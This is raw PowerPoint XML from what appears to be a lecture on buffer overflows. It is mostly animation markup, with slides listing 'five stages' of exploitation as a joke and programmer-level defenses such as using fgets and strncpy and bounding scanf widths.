                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="198"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="198"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="57" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="200"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="200"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="60" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="204"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="204"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="63" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="195"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="195"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="66" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="67" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="207"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="207"/>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5" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="208"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="208"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="75" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="254"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="254"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="78" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="204"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="204"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="81" presetID="9" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="200"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="200"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="84" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="257"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="257"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="87" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="90" presetID="22" presetClass="exit" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="207"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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257"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="257"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="98" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="260"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="100" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="260"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="101" presetID="22" presetClass="exit" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="258"/>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254"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="254"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="107" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="262"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="109"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87" grpId="0"/>
      <p:bldP spid="187" grpId="1"/>
      <p:bldP spid="188" grpId="0"/>
      <p:bldP spid="188" grpId="1"/>
      <p:bldP spid="198" grpId="0"/>
      <p:bldP spid="198" grpId="1"/>
      <p:bldP spid="200" grpId="0"/>
      <p:bldP spid="200" grpId="1"/>
      <p:bldP spid="257" grpId="0"/>
      <p:bldP spid="257" grpId="1"/>
      <p:bldP spid="2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a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10744200" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Five Stages of Exploiting Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED11538D-AB45-8642-92B9-BE0AF10AF9ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Huh. That’s weird.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whoa. That’s cool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I wonder if I can control that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yes, yes I can.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bwhahahaha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a: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94771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xEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="strips(downRight)">
                                      <p:cBhvr>
                                        <p:cTn id="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33</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Buffer Overflow Defenses</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3912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Programmer-Level Protections</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{627503F5-A6B3-F640-90F3-0D4710FC1087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1825625"/>
            <a:ext cx="5875752" cy="4667250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If possible, use a language that checks string bounds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit the number of characters read/copied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>gets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>fgets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>srtcpy,strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>strncmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>("%s")  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>("%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>s")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>also for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>fscanf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Don’t trust code you didn’t compile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>…and not even then</a:t>
            </a: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B7BB6A1A-95FA-9747-930B-2C9B9F4CF157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633140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9972316D-E87A-0145-888D-BC9682A745D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633140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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 8, stdin</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2" name="Rounded Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40BF0FC9-3F06-384F-82F2-6FDF9F4C7DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6329764" y="2393401"/>
            <a:ext cx="5022396" cy="2151838"/>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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Buffer at %p\n", buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
